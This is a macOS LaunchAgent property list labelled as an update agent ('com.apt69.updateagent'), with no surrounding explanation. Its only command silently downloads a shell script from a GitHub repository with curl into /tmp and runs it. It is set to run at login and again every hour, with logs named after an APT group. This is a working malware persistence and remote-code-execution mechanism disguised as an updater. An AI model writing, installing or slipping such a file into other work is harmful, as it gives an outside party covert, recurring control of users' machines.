<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.apt69.updateagent</string>
    <key>ProgramArguments</key>
    <array>
        <string>/bin/sh</string>
        <string>-c</string>
        <string>curl -s -o /tmp/update.sh https://www.github.com/svendev045/updates/raw/main/update.sh && /bin/sh /tmp/update.sh</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>StartInterval</key>
    <integer>3600</integer>
    <key>StandardOutPath</key>
    <string>/tmp/apt28out.log</string>
    <key>StandardErrorPath</key>
    <string>/tmp/apt28err.log</string>
</dict>
</plist>
